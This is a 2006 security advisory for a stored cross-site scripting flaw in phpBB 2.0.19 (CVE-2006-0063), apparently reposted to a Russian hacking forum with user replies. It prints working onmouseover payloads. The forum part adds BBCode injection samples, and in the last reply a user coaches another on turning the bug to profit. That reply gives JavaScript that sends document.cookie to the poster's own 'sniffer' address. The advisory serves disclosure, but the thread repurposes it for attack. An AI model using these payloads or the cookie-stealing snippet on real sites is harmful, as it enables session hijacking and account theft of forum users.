Topic : phpBB 2.0.19 XSS SecurityAlert Id : 30 SecurityRisk : Medium Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Maksymilian Arciemowicz Date : 5.1.2006 Affected Software : phpBB 2.0.19 and prior Advisory Text : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.19 XSS cXIb8O3.23] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 6.1.2006 from SecurityReason.Com CVE : CVE-2006-0063 - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. XSS --- If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al low HTML: YES" or are you Guest This issue is in phpBB 2.0.19 . Some Details : Old exploit for x <= 2.0.18 was (http://securityreason.com/achievement_securityalert/29) : <B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B> New exploit for x <= 2.0.19 is : <B C='>' onmouseover='alert("SecurityReason.Com")' X='<B '> SecurityReason.Com </B > The exploits are simillar but not the same ! As you can notice the " is replaced to ' In new version phpBB they only filter " but not ' that you can use this tags: <B C='>' onmouseover='alert("SecurityReason.Com")' X='<B '> SecurityReason.Com </B > Exploit: <B C='>' onmouseover='alert(document.location="http://SecurityReason.Com")' X='<B '> SecurityReason.Com </B> - --- SecurityReason Note : According to http://www.phpbb.com/phpBB/viewtopic.php?t=352966 [Sec] fixed XSS issue (only valid for Internet Explorer) within the url bbcode [Sec] fixed XSS issue (only valid for Internet Explorer) if html tags are allowed and enab led SecurityReason tested this issue before public advisory : http://securityreason.com/achievement_securityalert/29 and the XSS is working on : - -> Mozilla - -> Internet Explorer ( so !not! only valid Internet Explorer) - -> Opera - -> Firefox - -> Links As proof SecurityReason show examples of working XSS on screens : http://securityreason.com/downloads/mozilla.png -> Mozilla http://securityreason.com/downloads/opera.png -> Opera http://securityreason.com/downloads/firefox.png -> Firefox http://securityreason.com/downloads/links.png -> Links - --- We have reported this bug to phpbb bugtraq and: phpBB Team respone : - -------------------- ... we do not intended to fix the previous issue in 2.0.19 (it was just preventing it by the q uote change, which was good - but we intended this change because of other forseeable issues) - and i do not intend to fix this one. HTML is and was always "bad" and has been stated as being able to be entered "as is". In olympus we will therefore remove html support completely ... - -------------------- So Solusion is: phpBB Team respone : - ------------------- I already said we will fix it in CVS but do not see the need to release a new version imme diatly. - ------------------- So there is no fix for this . Only way to protect is : Allow HTML = Off - --- 2. Greets --- sp3x - --- 3.Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDvSzX3Ke13X/fTO4RAqlOAJ9eX7rok/p3Q0VHmYP8J21h26PvpgCbBGmJ mGGvK34tnNCl1WdnpZxfAcY= =dyrx -----END PGP SIGNATURE----- ------------------------------------------------------------ Нашёл на забугорном сайте хсс на пхпбб 2.0.19. Тестил, работает=) Для тех, кто не шарит Инглиш: хсс работает если включен HTML или вы гость. Вот сам експлойт Code: <B C='>' onmouseover='alert(document.location="http://antichat.ru")' X='<B '> antichat.ru </B> РАБОТАЕТ В: - -> Mozilla - -> Internet Explorer - -> Opera - -> Firefox
Там Я говорил о другом, там именно в ББ-тегах нету фильтров. А тут, когда разрешен HTML. HTML: [url]http://www.wj[email][email protected][/email].com[/url] Исходный код страницы, HTML: <a href="http://www.wj<a href="mailto:[email protected]>[email protected]</a>.com" target="_blank" class="postlink">http://www.wj<a href="mailto:[email protected]">[email protected]</a>.com</a> HTML: [img]http://www.wj[url]http://www.wj.com[/url].gif[/img] Исходный код страницы, HTML: <img src="http://www.wj<a href="http://www.wj.com target="_blank" class="postlink">http://www.wj.com</a>.gif" border="0" /> HTML: [img]http://www.wj[email][email protected][/email].gif[/img] Исходный код страницы, HTML: <img src="http://www.wj<a href="mailto:[email protected]>[email protected]</a>.gif" border="0" />
В админке phpbb есть пункт "Разрешить HTML". Он по умолчанию выключен, и не знаю, какой идиот его будет включать. Так что это все не то. Вообще когда появились коды xss еще на 17ю версию, на фурумах поддержки стали с большим опозданием появляться заплатки и их авторы говорили, что это защита не идеальная, коды надо дорабатывать и лучшего пока нет. Но проблема с хсс решалась тогда и решается до сих пор из той же админки пхпбб. Там в автоцензоре заменяются все возможные ключевые слова вроде "dokument", "cookie", "javascript" и проч. Лучше заменить на те же слова, но с русскими буквами. хсс не проходит. причем атакующему непонятно почему. Правда подписи юзеров при такой "защите" приходится сокращать знаков до двухсот. Там автоцензор не работает.
народ а как это теперь можно использовать с толком? Вот я попробовал всё роботает алерт есть а что теперь можно с этим зделать в свою выгоду?
miniden Вместо алерта вставляй туда свой снифер и чтою куки туда шли. Примерно так : img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie; (Вопросительный знак нужён). Понятно ндеюсь?.. Если нет, то в ПМ... =)
